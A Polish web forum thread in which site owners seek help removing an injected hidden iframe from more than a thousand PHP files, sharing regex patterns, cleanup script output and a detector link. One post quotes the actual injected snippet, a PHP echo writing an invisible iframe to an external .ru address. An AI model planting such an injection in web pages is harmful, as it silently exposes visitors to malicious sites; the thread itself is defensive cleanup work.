Skocz do zawartości

Wirus dolepił IFRAME'a

mjery

Rekomendowane odpowiedzi

Witam,

Proszę o pomoc z modyfikacją $pattern

Kod wirusa:

<?
#8c2699#
echo "    <script type=\"text/javascript\" language=\"javascript\" >                   document.write('<iframe src=\"https://jaqvicmy.ru/count7.php\" border=\"0\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>');</script>";
#/8c2699#
?>

Próbowałem z 3 godziny modyfikować:

$pattern="/<iframe src=\".*\" width=1 height=1.*\"><\/iframe>/";

Niestety nie wychodzi :/ - Proszę o pomoć.

Dzięki

Zacząc należy od wyczyszczenia kompa z wirusa, zmiany haseł ftp i nie trzymania ich w programach typu TC czy filezilla. Wirus z nich czyta hasła i wgrywa plik odpowiadający za infekcję. Poza wyczyszczeniem kodu trzeba zlokalizować plik ze skryptem, który powoduje infekcje oraz wyczyścić htaccess.

To już mam wykonane teraz chce usunąć wirusa z ponad 1000 plików :) i mam problem bo kurcze ręcznie to masakra. Próbowałem wyżej podanym skrypt przerobić:

$pattern="/#8c2699#(.*)#\/8c2699#/";

I nie usuwa ciągu znaków :/ w wirusie mam spacje i entery to może dlatego (.*) -> nie działa?

• 1 miesiąc temu...

Podbijam gdyby komuś się przydało:

https://semarch.pl/aktualnosci_news_1012_nigdy-wiecej-zlosliwego-iframe---detektor.html

Udostępniliśmy prosty darmowy skrypt do monitoringu witryn

Gdy macie zaledwie kilku klientów możecie uznać to za wartościową pomoc.

Charakterystyka w opisie, może w wolnej chwili napiszemy jakiś instruktarz instalacji ale póki co nie przewidujemy:-)

Skrypt na zasadzie - jest i działa. Na pewno poinformuje Was o infekcji strony praktycznie od razu.

W razie pytań proszę o priv,

Pozdro:)

• 2 miesiące temu...

Hej,

Nie wiem co robię nie tak. Uruchomiłam skrypt podany w wątku, poprawiony o $pattern="/\/\*qpi\*\/(.*?)\/\*qpi\*\//"; i wyskakuje mi takie coś:

$file) { echo "

Sprawdzam plik ".$file ."

"; $contents=@file_get_contents($file); $ncontents=preg_replace($pattern, "", $contents, -1, $count); if($count != '0') { if($kasuj == 1) if(@file_put_contents($file, $ncontents)) echo "

Znaleziono i pomyslnie skasowano iframe z pliku ".$file."

"; else echo "

Znaleziono lecz nie udało się usunac iframe z pliku ".$file."

"; } else echo "

Plik ".$file." nie jest zainfekowany

"; } ?>

i tylko to.... A wirus dalej siedzi w stronie :( Może znajdzie się ktoś kto mi powie co robię źle? Czy mam podać jakieś dodatkowe szczegóły?

Będę wdzięczna za odpowiedź!

• 1 miesiąc temu...

Jakiś czas temu sprawdziłem odnośniki z jakich wchodzono na moją stronę i okazało się ze były to jakieś zagraniczne serwisy np firmowe o których nie miałem pojęcia. Wejścia nie były z linków na tej stronie tylko z iframe doklejonego do ostatniej lini kodu jaki pokazuje sie w źródle strony. Dziś patrzę ponownie na te strony i doklejony iframe ma już inne strony ( tak jakby linki były w rotacji i nie kierowały do głownej strony serwisów tylko do poddstron które nie istnieją ). nie jest to żadne zaplecze ani nic a mojastrona znalazła się gdzieś tam w pływającej ramce o której nie mam pojęcia ja i przypuszczam właściciel strony. O co chodzi?

Katalog franczyz - dodaj lub przeglądaj firmy

Pomysł na biznes - przeglądaj wiadomości biznesowe i pomysły na biznes

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Ostatnio przeglądający   0 użytkowników

• Brak zarejestrowanych użytkowników przeglądających tę stronę.
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności